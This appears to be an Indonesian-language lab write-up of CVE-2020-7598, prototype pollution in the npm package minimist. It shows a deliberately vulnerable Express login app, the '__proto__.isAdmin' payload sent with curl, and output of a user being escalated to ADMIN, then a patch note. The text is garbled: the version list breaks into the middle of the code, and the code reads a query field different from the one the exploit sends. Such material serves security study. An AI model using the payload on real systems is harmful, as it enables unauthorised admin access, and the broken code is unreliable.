Share
## https://sploitus.com/exploit?id=77F3CAC1-D4FD-528E-BB22-DF4658372850
# CVE-2020-7598 - Prototype Pollution in minimist

## Disclaimer

Project ini dibuat hanya untuk:
- pembelajaran,
- penelitian keamanan,
- dan lab lokal pribadi.

Jangan digunakan terhadap sistem tanpa izin.

---

# Tentang CVE

CVE-2020-7598 adalah vulnerability Prototype Pollution pada package npm:

- minimist
- versi vulnerable:
  - `= 1.0.0  {

    /*
      Ambil raw query
    */
    const payload = req.query.payload;

    /*
      Ubah jadi array argument CLI
    */
    const args = payload.split(" ");

    console.log("ARGS:", args);

    /*
      Vulnerable parsing
    */
    minimist(args);

    console.log("GLOBAL isAdmin:", {}.isAdmin);

    res.send("Arguments parsed");
});

/*
 Login endpoint
*/
app.post("/login", express.json(), (req, res) => {

    const { username, password } = req.body;

    const user = users.find(
        u =>
          u.username === username &&
          u.password === password
    );

    if(!user){
        return res.json({
            success: false
        });
    }

    console.log("Own property:", user.hasOwnProperty("isAdmin"));
    console.log("user.isAdmin:", user.isAdmin);

    /*
      Vulnerable auth logic
    */
    if(user.isAdmin){
        return res.json({
            success: true,
            role: "ADMIN"
        });
    }

    res.json({
        success: true,
        role: "USER"
    });

});

app.listen(3000, () => {
    console.log("Server running on port 3000");
});
```

---

# Menjalankan Server

```bash
node app.js
```

Output:

```bash
Server running on port 3000
```

---

# Pengujian Normal

## Login Normal

```bash
curl -X POST http://localhost:3000/login \
-H "Content-Type: application/json" \
-d '{"username":"zen","password":"123"}'
```

Output:

```json
{
  "success": true,
  "role": "USER"
}
```

---

# Exploit CVE-2020-7598

## Payload Prototype Pollution

Buka browser:

```text
http://localhost:3000/parse?args[]=--__proto__.isAdmin=true
```

ATAU gunakan curl:

```bash
curl "http://localhost:3000/parse?args[]=--__proto__.isAdmin=true"
```

---

# Hasil Exploit

Terminal server:

```bash
GLOBAL isAdmin: true
```

Artinya:

```js
Object.prototype.isAdmin = true
```

berhasil dimodifikasi.

---

# Login Setelah Exploit

```bash
curl -X POST http://localhost:3000/login \
-H "Content-Type: application/json" \
-d '{"username":"zen","password":"123"}'
```

Output:

```json
{
  "success": true,
  "role": "ADMIN"
}
```

Padahal:
- database tidak berubah,
- source code tidak berubah,
- user tidak memiliki property `isAdmin`.

---

# Mengapa Bisa Menjadi ADMIN?

Code berikut:

```js
if(user.isAdmin)
```

tidak hanya memeriksa property langsung milik object.

JavaScript akan mencari:
1. property milik object,
2. lalu prototype chain.

Karena attacker berhasil memodifikasi:

```js
Object.prototype.isAdmin = true
```

maka seluruh object biasa mewarisi property tersebut.

---

# Bukti Prototype Pollution

Log server:

```bash
Own property: false
user.isAdmin: true
```

Artinya:
- `isAdmin` bukan property asli milik user,
- tetapi diwarisi dari prototype global.

---

# Patch

Versi aman minimist:

```bash
npm install minimist@latest
```

Versi patched memblokir:
- `__proto__`
- `constructor`
- `prototype`

sehingga prototype pollution tidak lagi berhasil.

---

# Referensi

- CVE: CVE-2020-7598
- Package: minimist
- CWE: CWE-1321 Prototype Pollution

---

# Author

Lab dan dokumentasi dibuat untuk kebutuhan pembelajaran keamanan aplikasi Node.js dan prototype pollution research.